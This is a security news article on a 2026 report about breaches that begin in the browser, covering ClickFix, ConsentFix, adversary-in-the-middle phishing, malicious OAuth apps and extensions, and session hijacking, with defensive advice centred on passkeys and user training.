Most Breaches Now Start in Your Browser—ClickFix, AITM, and the New Threat Landscape

The Browser Is the New Perimeter

For years, security teams built their defenses around the inbox. Email was where phishing began, where malware arrived, and where social engineering found its victims. That assumption is no longer safe. Push Security's 2026 Browser Attack Techniques report documents a fundamental shift in how breaches happen. According to the report, roughly one in three phishing attacks detected by their platform were delivered outside of email entirely, arriving instead through browser redirects, malicious search results, compromised advertisements, and manipulated OAuth flows.

The finding confirms what many security researchers have suspected for months. As email filtering has improved, attackers have pivoted to the browser itself as the primary entry point. "Modern breaches begin in the browser," the report states. "Often, they never leave it." The attacks target cloud applications and identities rather than traditional endpoints, making the browser a significant blind spot for organizations still focused on endpoint detection and email gateways.

ClickFix: The Technique Behind Nearly Half of All Initial Access

The most significant finding in the report is the dominance of ClickFix as an initial access technique. Microsoft reported that ClickFix was the top initial access vector it detected in 2025, involved in 47 percent of attacks. The technique works by socially engineering users into running malicious code on their own machines. In a typical ClickFix attack, the victim encounters what appears to be a legitimate error message, CAPTCHA verification, or software update prompt in their browser. The page instructs them to copy a command and paste it into a terminal, PowerShell window, or Run dialog to fix the supposed problem.

The command deploys remote access tools, infostealer malware, or both. Because the user manually executes the code, the attack bypasses most endpoint protections that focus on blocking automated execution. The victim has effectively become the delivery mechanism for their own compromise.

The report also identifies a new variant called ConsentFix, a browser native ClickFix attack that phishes an OAuth token by getting the victim to copy and paste a URL containing OAuth key material into a phishing page. Unlike traditional ClickFix, ConsentFix operates entirely within the browser and targets cloud application access directly without ever touching the endpoint's operating system.

AITM Phishing: MFA Is No Longer Enough

Adversary in the middle phishing has matured from a novel technique into a standard tool in the attacker's playbook. AITM kits work by placing a reverse proxy between the victim and the legitimate login page. The user sees the real site, enters their real credentials, and completes their real MFA challenge. The proxy captures everything, including the session token that the legitimate site returns after successful authentication. The attacker now has a fully authenticated session without ever needing the user's password or MFA device again.

Push Security's report emphasizes that most forms of MFA can be bypassed by AITM techniques. Real-world examples continue to surface, including a recent AiTM phishing campaign targeting TikTok business accounts through fake Google SSO pages. The exception is passkeys, which bind authentication to the specific domain and cannot be proxied. For organizations that have not yet deployed passkeys, the AITM threat means that multifactor authentication provides significantly less protection than many assume. A phishing resistant credential like a passkey or hardware security key is now the minimum viable defense against this class of attack.

The Full Threat Landscape

Beyond ClickFix and AITM, the report catalogs four additional browser based attack categories that security teams need to account for.

• Malicious OAuth applications that abuse legitimate consent flows to gain persistent access to cloud accounts without ever touching credentials
• Malicious browser extensions that gain access to cookies, form data, and browsing activity through permissions the user grants during installation
• Credential stuffing and ghost logins where previously breached passwords are tested against cloud applications at scale, with successful logins providing immediate access to business data
• Session hijacking using stolen session tokens extracted from compromised endpoints, infostealer logs, or browser extension data

What connects all six techniques is that they exploit the browser as a trusted intermediary. Legacy security tools that inspect network traffic, scan email attachments, or monitor endpoint processes often have limited visibility into what happens inside a browser session. The browser has become, in the report's framing, the primary attack surface for modern breaches. The consequences are visible at scale—over 7,500 Magento ecommerce sites were recently mass-compromised through an unauthenticated file upload vulnerability, turning trusted shopping sites into potential attack vectors for their visitors.

Why Legacy Tools Cannot Keep Up

The report argues that the shift toward browser based attacks has outpaced the security tools most organizations rely on. Secure email gateways stop phishing in the inbox but have no visibility into phishing that arrives through search results, ads, or social media links. Endpoint detection and response tools monitor file system and process activity but cannot inspect the contents of an encrypted browser session. Cloud access security brokers inspect traffic to known SaaS applications but may miss OAuth grants or browser extension activity.

The gap is not theoretical. The report includes case studies from real world incidents where attackers moved from initial browser compromise to full account takeover without triggering any alerts from traditional security tooling. In several cases, the entire attack chain, from phishing to data exfiltration, occurred within the browser without any executable touching the endpoint's file system.

What You Can Do About It

The most effective immediate step is deploying phishing resistant authentication. Passkeys and hardware security keys defeat AITM attacks because the authentication is bound to the legitimate domain and cannot be replayed through a proxy. For organizations that cannot deploy passkeys universally, enforcing conditional access policies that restrict logins to managed devices and known networks reduces the attack surface significantly.

Browser extension auditing should be a routine security process. Organizations can use group policies or mobile device management to restrict which extensions employees can install, and regular audits of installed extensions can identify suspicious or unnecessary permissions.

For ClickFix specifically, user awareness training needs to evolve beyond email phishing scenarios to include browser based social engineering. Employees should know that any webpage asking them to open a terminal and paste a command is almost certainly malicious, regardless of how legitimate the page appears. The combination of technical controls and updated training is the minimum viable defense against a threat landscape that has moved decisively from the inbox to the browser.